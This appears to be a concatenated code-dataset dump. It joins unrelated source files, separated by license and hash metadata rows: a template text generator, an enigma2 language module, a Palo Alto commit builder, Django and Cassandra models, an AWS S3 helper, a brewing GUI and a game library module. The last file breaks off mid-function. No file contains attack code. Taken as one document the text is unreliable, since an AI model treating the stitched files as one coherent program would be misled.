text = self._group_map[group]
except KeyError:
self._group_map[group] = text = next(self._get_iter(path))
return text
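# Illustrative note (an assumption, not in the original module): inside a
# Mako template, ${item('names.txt')} draws a fresh random line on every
# call, while ${item('names.txt', group=1)} returns the same line for all
# calls sharing that group within a single rendered text.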
class ItemFuncFactory(object):
def __init__(self, environ_ref):
self._environ_ref = environ_ref
self._iter_map = {}
def __call__(self):
return ItemFunc(self._get_iter)
def _resolve_path(self, path):
root_dir = self._environ_ref().root_dir
return os.path.join(root_dir, path)
def _get_iter(self, path):
try:
it = self._iter_map[path]
except KeyError:
self._iter_map[path] = it = \
get_items.get_random_infinite_items(self._resolve_path(path))
return it
class CustomFunc(object):
def __init__(self, get_impl):
self._get_impl = get_impl
self._impl_map = {}
def __call__(self, custom_name):
try:
impl = self._impl_map[custom_name]
except KeyError:
self._impl_map[custom_name] = impl = self._get_impl(custom_name)()
return impl
class CustomFuncFactory(object):
def __init__(self, environ_ref):
self._environ_ref = environ_ref
self._impl_map = {}
def __call__(self):
return CustomFunc(self._get_impl)
def _get_impl(self, custom_name):
try:
impl = self._impl_map[custom_name]
except KeyError:
func_name, module_name = custom_name.rsplit(':', 1)
mod = importlib.import_module(module_name)
factory = mod.FUNC_FACTORY_MAP[func_name]
self._impl_map[custom_name] = impl = factory(self._environ_ref)
return impl
FUNC_FACTORY_MAP = {
'item': ItemFuncFactory,
'custom': CustomFuncFactory,
}
DEFAULT_FUNC_FACTORY_MAP = FUNC_FACTORY_MAP
def count_iter(count):
if count is not None:
for i in range(count):
# TODO: for Python-3.3+ -- need fix to PEP-0380
yield i
else:
while True:
yield
def tpl_txt_gen_iter(tpl_path, count=None,
environ=None, func_factory_map=None):
if environ is None:
environ = TplTxtGenEnviron()
environ.tpl_path = tpl_path
environ.count = count
environ.root_dir = os.path.dirname(environ.tpl_path)
environ.tpl_name = os.path.basename(environ.tpl_path)
environ.tpl_lookup = mako_lookup.TemplateLookup(directories=(environ.root_dir, ))
environ.tpl = environ.tpl_lookup.get_template(environ.tpl_name)
if func_factory_map is None:
func_factory_map = DEFAULT_FUNC_FACTORY_MAP
func_factories = {
func_name:
func_factory_map[func_name](weakref.ref(environ))
for func_name in func_factory_map
}
for i in count_iter(environ.count):
tpl_kwargs = {
func_name:
func_factories[func_name]()
for func_name in func_factories
}
yield environ.tpl.render(**tpl_kwargs)
def tpl_txt_gen(tpl_path, out_path, count):
out_path_created = False
for i, text in enumerate(tpl_txt_gen_iter(tpl_path, count=count)):
if not out_path_created:
os.mkdir(out_path)
out_path_created = True
out_name = 'out-{}.txt'.format(i)
full_out_path = os.path.join(out_path, out_name)
with open(full_out_path, 'w', encoding='utf-8', newline='\n') as fd:
fd.write(text)
| gpl-3.0 | 6,140,002,801,200,075,000 | 29.8 | 85 | 0.592585 | false | 3.726776 | false | false | false |
kingvuplus/nn-gui | lib/python/Components/Language.py | 1 | 5367 | import gettext
from Tools.Directories import SCOPE_LANGUAGE, resolveFilename, fileExists
import language_cache
class Language:
def __init__(self):
gettext.install('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), unicode=0, codeset="utf-8")
self.activeLanguage = 0
self.lang = {}
self.langlist = []
# FIXME make list dynamically
# name, iso-639 language, iso-3166 country. Please don't mix language&country!
# also, see "precalcLanguageList" below on how to re-create the language cache after you added a language
language_path = "/usr/share/enigma2/po/%s/LC_MESSAGES/enigma2.mo"
if fileExists(language_path % "en"):
self.addLanguage(_("English"), "en", "EN")
if fileExists(language_path % "de"):
self.addLanguage(_("German"), "de", "DE")
if fileExists(language_path % "ar"):
self.addLanguage(_("Arabic"), "ar", "AE")
if fileExists(language_path % "ca"):
self.addLanguage(_("Catalan"), "ca", "AD")
if fileExists(language_path % "hr"):
self.addLanguage(_("Croatian"), "hr", "HR")
if fileExists(language_path % "cs"):
self.addLanguage(_("Czech"), "cs", "CZ")
if fileExists(language_path % "da"):
self.addLanguage(_("Danish"), "da", "DK")
if fileExists(language_path % "nl"):
self.addLanguage(_("Dutch"), "nl", "NL")
if fileExists(language_path % "et"):
self.addLanguage(_("Estonian"), "et", "EE")
if fileExists(language_path % "fi"):
self.addLanguage(_("Finnish"), "fi", "FI")
if fileExists(language_path % "fr"):
self.addLanguage(_("French"), "fr", "FR")
if fileExists(language_path % "el"):
self.addLanguage(_("Greek"), "el", "GR")
if fileExists(language_path % "hu"):
self.addLanguage(_("Hungarian"), "hu", "HU")
if fileExists(language_path % "lt"):
self.addLanguage(_("Lithuanian"), "lt", "LT")
if fileExists(language_path % "lv"):
self.addLanguage(_("Latvian"), "lv", "LV")
if fileExists(language_path % "is"):
self.addLanguage(_("Icelandic"), "is", "IS")
if fileExists(language_path % "it"):
self.addLanguage(_("Italian"), "it", "IT")
if fileExists(language_path % "no"):
self.addLanguage(_("Norwegian"), "no", "NO")
if fileExists(language_path % "pl"):
self.addLanguage(_("Polish"), "pl", "PL")
if fileExists(language_path % "pt"):
self.addLanguage(_("Portuguese"), "pt", "PT")
if fileExists(language_path % "ru"):
self.addLanguage(_("Russian"), "ru", "RU")
if fileExists(language_path % "sr"):
self.addLanguage(_("Serbian"), "sr", "YU")
if fileExists(language_path % "sk"):
self.addLanguage(_("Slovakian"), "sk", "SK")
if fileExists(language_path % "sl"):
self.addLanguage(_("Slovenian"), "sl", "SI")
if fileExists(language_path % "es"):
self.addLanguage(_("Spanish"), "es", "ES")
if fileExists(language_path % "sv"):
self.addLanguage(_("Swedish"), "sv", "SE")
if fileExists(language_path % "tr"):
self.addLanguage(_("Turkish"), "tr", "TR")
if fileExists(language_path % "uk"):
self.addLanguage(_("Ukrainian"), "uk", "UA")
if fileExists(language_path % "fy"):
self.addLanguage(_("Frisian"), "fy", "x-FY") # there is no separate country for frisian
self.callbacks = []
def addLanguage(self, name, lang, country):
try:
self.lang[str(lang + "_" + country)] = ((_(name), lang, country))
self.langlist.append(str(lang + "_" + country))
except:
print "Language " + str(name) + " not found"
def activateLanguage(self, index):
try:
lang = self.lang[index]
print "Activating language " + lang[0]
gettext.translation('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), languages=[lang[1]]).install()
self.activeLanguage = index
for x in self.callbacks:
x()
except:
print "Selected language does not exist!"
lang = self.lang["en_EN"]
print "Activating default language " + lang[0]
gettext.translation('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), languages=[lang[1]]).install()
self.activeLanguage = "en_EN"
for x in self.callbacks:
x()
def activateLanguageIndex(self, index):
if index < len(self.langlist):
self.activateLanguage(self.langlist[index])
def getLanguageList(self):
return [ (x, self.lang[x]) for x in self.langlist ]
def getActiveLanguage(self):
return self.activeLanguage
def getActiveLanguageIndex(self):
idx = 0
for x in self.langlist:
if x == self.activeLanguage:
return idx
idx += 1
return 0
def getLanguage(self):
try:
return str(self.lang[self.activeLanguage][1]) + "_" + str(self.lang[self.activeLanguage][2])
except:
return 'en_EN'
def addCallback(self, callback):
self.callbacks.append(callback)
def precalcLanguageList(self):
# excuse me for those T1, T2 hacks please. The goal was to keep the language_cache.py as small as possible, *and*
# don't duplicate these strings.
T1 = _("Please use the UP and DOWN keys to select your language. Afterwards press the OK button.")
T2 = _("Language selection")
l = open("language_cache.py", "w")
print >>l, "# -*- coding: UTF-8 -*-"
print >>l, "LANG_TEXT = {"
for language in self.langlist:
self.activateLanguage(language)
print >>l, '"%s": {' % language
for name, lang, country in self.lang.values():
print >>l, '\t"%s_%s": "%s",' % (lang, country, _(name))
print >>l, '\t"T1": "%s",' % (_(T1))
print >>l, '\t"T2": "%s",' % (_(T2))
print >>l, '},'
print >>l, "}"
language = Language()
| gpl-2.0 | 8,769,935,896,946,912,000 | 35.263514 | 116 | 0.642631 | false | 2.991639 | false | false | false |
PaloAltoNetworks-BD/SplunkforPaloAltoNetworks | Splunk_TA_paloalto/bin/lib/pan-python/lib/pan/commit.py | 2 | 5068 | #
# Copyright (c) 2013-2014 Kevin Steves <[email protected]>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
from __future__ import print_function
import sys
import logging
from . import DEBUG1, DEBUG2, DEBUG3
_valid_part = set([
'device-and-network-excluded',
'policy-and-objects-excluded',
'shared-object-excluded',
'no-vsys',
'vsys',
])
_part_xml = {
'device-and-network-excluded':
'<device-and-network>excluded</device-and-network>',
'policy-and-objects-excluded':
'<policy-and-objects>excluded</policy-and-objects>',
'shared-object-excluded':
'<shared-object>excluded</shared-object>',
'no-vsys':
'<no-vsys></no-vsys>',
'vsys':
'<member>%s</member>',
}
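# Illustrative example (not part of pan-python): a partial commit restricted
# to a single vsys renders roughly as
#   <commit><partial><vsys><member>vsys1</member></vsys></partial></commit>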
def valid_part(part):
return part in _valid_part
class PanCommit:
def __init__(self,
validate=False,
force=False,
commit_all=False,
merge_with_candidate=False):
self._log = logging.getLogger(__name__).log
self._validate = validate
self._force = force
self._commit_all = commit_all
self._merge_with_candidate = merge_with_candidate
self.partial = set()
self._vsys = set()
self._device = None
self._device_group = None
def validate(self):
self._validate = True
def force(self):
self._force = True
def commit_all(self):
self._commit_all = True
def merge_with_candidate(self):
self._merge_with_candidate = True
def device_and_network_excluded(self):
part = 'device-and-network-excluded'
self.partial.add(part)
def policy_and_objects_excluded(self):
part = 'policy-and-objects-excluded'
self.partial.add(part)
def shared_object_excluded(self):
part = 'shared-object-excluded'
self.partial.add(part)
def no_vsys(self):
part = 'no-vsys'
self.partial.add(part)
def vsys(self, vsys):
if not self._commit_all:
part = 'vsys'
self.partial.add(part)
if type(vsys) == type(''):
vsys = [vsys]
for name in vsys:
self._vsys.add(name)
def device(self, serial):
self._device = serial
def device_group(self, device_group):
self._device_group = device_group
def cmd(self):
if self._commit_all:
return self.__commit_all()
else:
return self.__commit()
def __commit_all(self):
s = '<commit-all><shared-policy>'
if self._device:
s += '<device>%s</device>' % self._device
if self._device_group:
s += '<device-group>%s</device-group>' % self._device_group
# default when no <merge-with-candidate-cfg/> is 'yes'
# we default to 'no' like the Web UI
merge_xml = '<merge-with-candidate-cfg>%s</merge-with-candidate-cfg>'
if self._merge_with_candidate:
merge = 'yes'
else:
merge = 'no'
s += merge_xml % merge
if self._vsys:
s += '<vsys>%s</vsys>' % self._vsys.pop()
s += '</shared-policy></commit-all>'
self._log(DEBUG1, 'commit-all cmd: %s', s)
return s
def __commit(self):
s = '<commit>'
if self._validate:
s += '<validate>'
if self._force:
s += '<force>'
if self.partial:
s += '<partial>'
for part in self.partial:
if part in _part_xml:
if part == 'vsys':
s += '<vsys>'
for name in self._vsys:
xml_vsys = _part_xml[part] % name
s += xml_vsys
s += '</vsys>'
else:
s += _part_xml[part]
if self.partial:
s += '</partial>'
if self._force:
s += '</force>'
if self._validate:
s += '</validate>'
s += '</commit>'
self._log(DEBUG1, 'commit cmd: %s', s)
return s
if __name__ == '__main__':
import pan.commit
c = pan.commit.PanCommit()
c.force()
c.device_and_network_excluded()
c.policy_and_objects_excluded()
c.shared_object_excluded()
c.vsys(['vsys4', 'vsys5'])
print('cmd:', c.cmd())
| isc | -1,830,847,370,469,896,400 | 25.957447 | 77 | 0.555051 | false | 3.807663 | false | false | false |
newerthcom/savagerebirth | libs/python-2.72/Stackless/test/test_pickle.py | 1 | 1069 | import sys, cPickle, pickle
from stackless import *
def run_pickled(func, *args):
t = tasklet(func)(*args)
print "starting tasklet"
t.run()
print "pickling"
# hack for pickle
if pickl == pickle:
t.tempval = None
pi = pickl.dumps(t)
t.remove()
#print pi
file("temp.pickle", "wb").write(pi)
print "unpickling"
ip = pickl.loads(pi)
print "starting unpickled tasklet"
ip.run()
def test(n, when):
for i in range(n):
if i==when:
schedule()
print i
def rectest(nrec, lev=0):
print lev*" " + "entering", lev+1
if lev < nrec:
rectest(nrec, lev+1)
else:
schedule()
print lev*" " + "leaving", lev+1
pickl = pickle # note that the refcounts are correct with pickle.py
# but also note that in 2.2, pickle seems broken for extension types
# which are referencing themselves...
print
print "testing pickled iteration"
print 60*"-"
print
run_pickled(test, 20, 13)
print
print "testing pickled recursion"
print 60*"-"
print
run_pickled(rectest, 13)
| gpl-2.0 | 5,018,692,409,707,227,000 | 19.557692 | 68 | 0.623012 | false | 3.239394 | true | false | false |
Orpheus11/nile | nile/db/models.py | 1 | 4339 | from nile.common import log as logging
from nile.common import exception
from nile.common.i18n import _
from nile.common import models
from nile.common import pagination
from nile.common import utils
from nile.db import db_query
from nile.db import get_db_api
LOG = logging.getLogger(__name__)
class DatabaseModelBase(models.ModelBase):
_auto_generated_attrs = ['id']
@classmethod
def create(cls, **values):
now_time = utils.utcnow()
init_vals = {
'id': utils.generate_uuid(),
'created': now_time,
}
if hasattr(cls, 'deleted'):
init_vals['deleted'] = False
if hasattr(cls, 'updated'):
init_vals['updated'] = now_time
init_vals.update(values)
instance = cls(**init_vals)
if not instance.is_valid():
raise exception.InvalidModelError(errors=instance.errors)
return instance.save()
@property
def db_api(self):
return get_db_api()
@property
def preserve_on_delete(self):
return hasattr(self, 'deleted') and hasattr(self, 'deleted_at')
@classmethod
def query(cls):
return get_db_api()._base_query(cls)
def save(self):
if not self.is_valid():
raise exception.InvalidModelError(errors=self.errors)
self['updated'] = utils.utcnow()
LOG.debug("Saving %(name)s: %(dict)s" %
{'name': self.__class__.__name__, 'dict': self.__dict__})
return self.db_api.save(self)
def delete(self):
self['updated'] = utils.utcnow()
LOG.debug("Deleting %(name)s: %(dict)s" %
{'name': self.__class__.__name__, 'dict': self.__dict__})
if self.preserve_on_delete:
self['deleted_at'] = utils.utcnow()
self['deleted'] = True
return self.db_api.save(self)
else:
return self.db_api.delete(self)
def update(self, **values):
for key in values:
if hasattr(self, key):
setattr(self, key, values[key])
self['updated'] = utils.utcnow()
return self.db_api.save(self)
def __init__(self, **kwargs):
self.merge_attributes(kwargs)
if not self.is_valid():
raise exception.InvalidModelError(errors=self.errors)
def merge_attributes(self, values):
"""dict.update() behaviour."""
for k, v in values.iteritems():
self[k] = v
@classmethod
def find_by(cls, context=None, **conditions):
model = cls.get_by(**conditions)
if model is None:
raise exception.ModelNotFoundError(_("%(s_name)s Not Found") %
{"s_name": cls.__name__})
if ((context and not context.is_admin and hasattr(model, 'user_id')
and model.user_id != context.user_id)):
msg = _("User %(s_user_id)s tried to access "
"%(s_name)s, owned by %(s_owner)s.")
LOG.error(msg % (
{"s_user_id": context.user_id, "s_name": cls.__name__,
"s_owner": model.user_id}))
raise exception.ModelNotFoundError(
_("User %(s_user_id)s cannot access %(s_name)s") % (
{"s_user_id": context.user_id, "s_name": cls.__name__}))
return model
@classmethod
def get_by(cls, **kwargs):
return get_db_api().find_by(cls, **cls._process_conditions(kwargs))
@classmethod
def find_all(cls, **kwargs):
return db_query.find_all(cls, **cls._process_conditions(kwargs))
@classmethod
def _process_conditions(cls, raw_conditions):
"""Override in inheritors to format/modify any conditions."""
return raw_conditions
@classmethod
def find_by_pagination(cls, collection_type, collection_query, order_by=None, page_size=200, page_index=0):
elements, count = collection_query.paginated_collection(order_by=order_by, page_size=page_size, page_index=page_index)
return pagination.PaginatedDataView(collection_type,
elements,
page_index=page_index,
page_size=page_size,
total_size=count)
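# Usage sketch (illustrative; SomeModel is a hypothetical subclass of
# DatabaseModelBase):
#     instance = SomeModel.create(name="demo")
#     found = SomeModel.find_by(id=instance.id)
#     found.update(name="renamed")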
| apache-2.0 | -7,782,729,962,570,167,000 | 34.276423 | 126 | 0.555428 | false | 3.962557 | false | false | false |
jayceyxc/hue | desktop/core/ext-py/rsa-3.4.2/setup.py | 9 | 2511 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2011 Sybren A. Stüvel <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
if __name__ == '__main__':
setup(name='rsa',
version='3.4.2',
description='Pure-Python RSA implementation',
author='Sybren A. Stuvel',
author_email='[email protected]',
maintainer='Sybren A. Stuvel',
maintainer_email='[email protected]',
url='https://stuvel.eu/rsa',
packages=['rsa'],
license='ASL 2',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Security :: Cryptography',
],
install_requires=[
'pyasn1 >= 0.1.3',
],
entry_points={'console_scripts': [
'pyrsa-priv2pub = rsa.util:private_to_public',
'pyrsa-keygen = rsa.cli:keygen',
'pyrsa-encrypt = rsa.cli:encrypt',
'pyrsa-decrypt = rsa.cli:decrypt',
'pyrsa-sign = rsa.cli:sign',
'pyrsa-verify = rsa.cli:verify',
'pyrsa-encrypt-bigfile = rsa.cli:encrypt_bigfile',
'pyrsa-decrypt-bigfile = rsa.cli:decrypt_bigfile',
]},
)
| apache-2.0 | 8,079,674,007,353,006,000 | 40.147541 | 75 | 0.568924 | false | 4.114754 | false | false | false |
CatalystOfNostalgia/hoot | server/hoot/aws_module.py | 1 | 1175 | import json, boto, boto.s3.connection, bottlenose, os.path, time
from boto.s3.key import Key
from urllib.error import HTTPError
# Load the AWS key information
with open(os.path.dirname(os.path.realpath(__file__)) + "/keys/aws_keys.json") as f:
    configs = json.loads(f.read())
s3conn = boto.connect_s3(aws_access_key_id=configs["aws_public_key"],aws_secret_access_key=configs["aws_secret_key"])
bucket = s3conn.get_bucket("hootproject")
def error_handler(err):
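    # Retry throttled calls: on HTTP 503, sleep for a randomized exponential
    # backoff (mean ~10 s) and return True so bottlenose retries the request.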
ex = err['exception']
if isinstance(ex, HTTPError) and ex.code == 503:
time.sleep(random.expovariate(0.1))
return True
def setup_product_api():
return bottlenose.Amazon(configs["aws_public_key"],
configs["aws_secret_key"],
configs["product_api_tag"],
ErrorHandler=error_handler,
MaxQPS=0.9)
def push_to_S3(filename, jsonToUpload):
k = Key(bucket)
k.key = filename
k.set_contents_from_string(jsonToUpload)
def retrieve_from_S3(filename):
key = bucket.new_key(filename)
contents = key.get_contents_as_string().decode(encoding='UTF-8')
return contents
| mit | 3,316,388,972,341,448,000 | 34.606061 | 117 | 0.639149 | false | 3.357143 | true | false | false |
mburgess00/brew_controller | brew_gui.py | 1 | 2691 | #!/usr/bin/env python3
from guizero import App, Text, Slider, Combo, PushButton, Box, Picture
pause = True
def readsensors():
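    # Stub readings standing in for real temperature probes; a hardware
    # read (hypothetical) would replace these fixed values.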
return {"hlt" : 160, "rims" : 152, "bk" : 75}
def handlepause():
global pause
global pauseState
print("Pause Button pressed")
if pause:
print("running")
pause = not pause
pauseState.value=("Running")
hltFlame.visible=True
rimsFlame.visible=True
bkFlame.visible=True
else:
print("pausing")
pause = not pause
pauseState.value=("Paused")
hltFlame.visible=False
rimsFlame.visible=False
bkFlame.visible=False
return
app = App(title="Brew GUI", width=1280, height=768, layout="grid")
vertPad = Picture(app, image="blank_vert.gif", grid=[0,0])
hltBox = Box(app, layout="grid", grid=[1,0])
hltPad = Picture(hltBox, image="blank.gif", grid=[0,0])
hltTitle = Text(hltBox, text="HLT", grid=[0,1], align="top")
hltText = Text(hltBox, text="180", grid=[0,2], align="top")
hltSlider = Slider(hltBox, start=212, end=100, horizontal=False, grid=[0,3], align="top")
hltSlider.tk.config(length=500, width=50)
hltFlamePad = Picture(hltBox, image="blank_flame.gif", grid=[0,4])
hltFlame = Picture(hltBox, image="flame.gif", grid=[0,4])
rimsBox = Box(app, layout="grid", grid=[2,0])
rimsPad = Picture(rimsBox, image="blank.gif", grid=[0,0])
rimsTitle = Text(rimsBox, text="RIMS", grid=[0,1], align="top")
rimsText = Text(rimsBox, text="180", grid=[0,2], align="top")
rimsSlider = Slider(rimsBox, start=212, end=100, horizontal=False, grid=[0,3], align="top")
rimsSlider.tk.config(length=500, width=50)
rimsFlamePad = Picture(rimsBox, image="blank_flame.gif", grid=[0,4])
rimsFlame = Picture(rimsBox, image="flame.gif", grid=[0,4])
bkBox = Box(app, layout="grid", grid=[3,0])
bkPad = Picture(bkBox, image="blank.gif", grid=[0,0])
bkTitle = Text(bkBox, text="BK", grid=[0,1], align="top")
bkText = Text(bkBox, text="75", grid=[0,2], align="top")
bkSlider = Slider(bkBox, start=100, end=0, horizontal=False, grid=[0,3], align="top")
bkSlider.tk.config(length=500, width=50)
bkFlamePad = Picture(bkBox, image="blank_flame.gif", grid=[0,4])
bkFlame = Picture(bkBox, image="flame.gif", grid=[0,4])
modeBox = Box(app, layout="grid", grid=[4,0])
modePad = Picture(modeBox, image="blank.gif", grid=[0,0])
modeTitle = Text(modeBox, text="Mode", grid=[0,0], align="top")
mode = Combo(modeBox, options=["HLT", "RIMS", "BK"], grid=[1,0])
pauseState = Text(modeBox, text="Paused", grid=[0,1])
pauseButton = PushButton(modeBox, icon="pause-play.gif", command=handlepause, grid=[1,1])
hltFlame.visible=False
rimsFlame.visible=False
bkFlame.visible=False
app.display()
| apache-2.0 | -2,969,034,358,908,253,000 | 37.442857 | 91 | 0.668525 | false | 2.737538 | false | false | false |
tbpmig/mig-website | bookswap/migrations/0002_faqitem_locationimage.py | 1 | 1308 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import stdimage.models
class Migration(migrations.Migration):
dependencies = [
('bookswap', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FAQItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.TextField()),
('text', models.TextField()),
('display_order', models.PositiveSmallIntegerField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='LocationImage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('photo', stdimage.models.StdImageField(upload_to=b'bookswap_photos')),
('super_caption', models.TextField(null=True, blank=True)),
('sub_caption', models.TextField()),
('display_order', models.PositiveSmallIntegerField()),
],
options={
},
bases=(models.Model,),
),
]
| apache-2.0 | 1,716,465,798,750,666,500 | 31.7 | 114 | 0.529052 | false | 4.791209 | false | false | false |
Jpadilla1/notaso | notaso/universities/models.py | 1 | 1258 | from django.db import models
from ..professors.models import Professor
def get_upload_file_name(instance, filename):
return "static/uploaded_files/%s" % (filename)
class University(models.Model):
name = models.CharField(max_length=50)
city = models.CharField(max_length=25)
emblem = models.FileField(upload_to=get_upload_file_name)
slug = models.SlugField(null=False)
def __unicode__(self):
return u'%s %s' % (self.name, self.city)
def save(self, *args, **kwargs):
self.slug = self.slug.lower()
super(University, self).save(*args, **kwargs)
    def count(self):
        return Professor.objects.filter(university=self).count()
    def get_grade(self):
        professors = Professor.objects.filter(university=self)
count = 0
percent = 0
for p in professors:
percent += p.get_percent()
count += 1
if count == 0:
percent = 0
else:
percent = percent/count
if percent >= 90:
return 'A'
elif percent >= 80:
return 'B'
elif percent >= 70:
return 'C'
elif percent >= 60:
return 'D'
else:
return 'F'
| mit | 2,519,322,818,903,721,500 | 25.208333 | 68 | 0.572337 | false | 3.755224 | false | false | false |
JoyTeam/metagam | mg/constructor/library.py | 1 | 23694 | #!/usr/bin/python2.6
# This file is a part of Metagam project.
#
# Metagam is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# Metagam is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Metagam. If not, see <http://www.gnu.org/licenses/>.
from mg.constructor import *
import re
re_double_slash = re.compile(r'//')
re_valid_code = re.compile(r'^[a-z0-9][a-z0-9\-_]*(\/[a-z0-9\-_]*[a-z0-9_])*$')
re_del = re.compile(r'^del\/(.+)$')
re_valid_pgcode = re.compile(r'u_[a-z0-9_]+$')
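# Illustrative examples (not in the original): re_valid_code accepts page
# codes such as "index" or "combats/rules" and rejects codes with empty
# segments such as "bad//code".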
class DBLibraryPage(CassandraObject):
clsname = "LibraryPage"
indexes = {
"all": [[], "code"],
"code": [["code"]],
}
class DBLibraryPageList(CassandraObjectList):
objcls = DBLibraryPage
class DBLibraryGroup(CassandraObject):
clsname = "LibraryGroup"
indexes = {
"all": [[], "code"],
"code": [["code"]],
"everywhere": [["everywhere"]],
}
class DBLibraryGroupList(CassandraObjectList):
objcls = DBLibraryGroup
class DBLibraryPageGroup(CassandraObject):
clsname = "LibraryPageGroup"
indexes = {
"grp": [["grp"]],
"page": [["page"]],
}
class DBLibraryPageGroupList(CassandraObjectList):
objcls = DBLibraryPageGroup
class Library(ConstructorModule):
def register(self):
self.rhook("gameinterface.buttons", self.gameinterface_buttons)
self.rhook("ext-library.index", self.library_index, priv="public")
self.rhook("ext-library.handler", self.library_handler, priv="public")
self.rhook("socio.button-blocks", self.button_blocks)
self.rhook("sociointerface.buttons", self.buttons)
self.rhook("library-page-index.content", self.page_index)
self.rhook("hook-lib.catalog", self.hook_catalog)
self.rhook("library.page-groups", self.page_groups)
self.rhook("library.icon", self.icon)
self.rhook("admin-icons.list", self.icons_list)
def icons_list(self, icons):
icons.append({
"code": "library-icon",
"title": self._("Library icon"),
"default": "/st-mg/icons/library-icon.png",
})
def icon(self, uri):
img = self.call("icon.get", "library-icon", default_icon="/st-mg/icons/library-icon.png")
return ' <a href="%s" target="_blank"><img src="%s" alt="?" class="library-icon" /></a>' % (uri, img)
def button_blocks(self, blocks):
blocks.append({"id": "library", "title": self._("Library"), "class": "library"})
def child_modules(self):
return ["mg.constructor.library.LibraryAdmin"]
def gameinterface_buttons(self, buttons):
buttons.append({
"id": "library",
"href": "/library",
"target": "_blank",
"icon": "library.png",
"title": self._("Game library"),
"block": "top-menu",
"order": 8,
})
def library_index(self):
self.library_page("index")
def library_handler(self):
req = self.req()
self.library_page(req.args)
def library_page(self, code):
if not re_valid_code.match(code):
self.call("web.not_found")
lst = self.objlist(DBLibraryPageList, query_index="code", query_equal=code)
lst.load()
if len(lst):
pent = lst[0]
else:
pent = self.call("library-page-%s.content" % code, render_content=True)
if not pent:
self.call("web.not_found")
vars = {
"title": htmlescape(pent.get("title")),
"keywords": htmlescape(pent.get("keywords")),
"description": htmlescape(pent.get("description")),
"allow_bracket_hooks": True,
}
vars["library_content"] = self.call("web.parse_inline_layout", pent.get("content"), vars)
# loading blocks
blocks = {}
lst = self.objlist(DBLibraryGroupList, query_index="everywhere", query_equal="1")
lst.load()
for ent in lst:
blocks[ent.get("code")] = {
"code": ent.get("code"),
"content": ent.get("block_content"),
"order": ent.get("block_order"),
}
lst = self.objlist(DBLibraryPageGroupList, query_index="page", query_equal=code)
lst.load(silent=True)
for ent in lst:
if ent.get("grp") not in blocks:
grplst = self.objlist(DBLibraryGroupList, query_index="code", query_equal=ent.get("grp"))
grplst.load()
for grp in grplst:
if grp.get("block"):
blocks[grp.get("code")] = {
"code": grp.get("code"),
"content": grp.get("block_content"),
"order": grp.get("block_order"),
}
if len(blocks):
blocks = blocks.values()
blocks.sort(cmp=lambda x, y: cmp(x.get("order"), y.get("order")) or cmp(x.get("code"), y.get("code")))
vars["library_blocks"] = [self.call("web.parse_inline_layout", blk["content"], vars) for blk in blocks]
# loading parents
menu_left = [{"html": vars["title"], "lst": True}]
parent = pent.get("parent")
shown = set()
shown.add(pent.get("code"))
while parent and parent not in shown:
shown.add(parent)
lst = self.objlist(DBLibraryPageList, query_index="code", query_equal=parent)
lst.load()
if len(lst):
parent_ent = lst[0]
else:
parent_ent = self.call("library-page-%s.content" % parent, render_content=False)
if not parent_ent:
break
menu_left.insert(0, {"html": htmlescape(parent_ent.get("title")), "href": "/library" if parent == "index" else "/library/%s" % parent})
parent = parent_ent.get("parent")
if menu_left:
vars["menu_left"] = menu_left
self.call("socio.response_template", "library.html", vars)
def buttons(self, buttons):
buttons.append({
"id": "forum-library",
"href": "/library",
"title": self._("Library"),
"target": "_self",
"block": "forum",
"order": 10,
"left": True,
})
def page_index(self, render_content):
pageinfo = {
"title": self._("Library - %s") % self.app().project.get("title_short"),
}
if render_content:
pageinfo["content"] = '[hook:lib.catalog grp="index"]'
return pageinfo
def page_groups(self, page_groups):
page_groups.append({
"code": "index",
"title": self._("Publish on the library indexpage"),
})
lst = self.objlist(DBLibraryGroupList, query_index="all")
lst.load()
for ent in lst:
page_groups.append({
"code": ent.get("code"),
"title": ent.get("title"),
"uuid": ent.uuid,
"manual": True,
"everywhere": ent.get("everywhere"),
})
def hook_catalog(self, vars, grp, delim="<br />"):
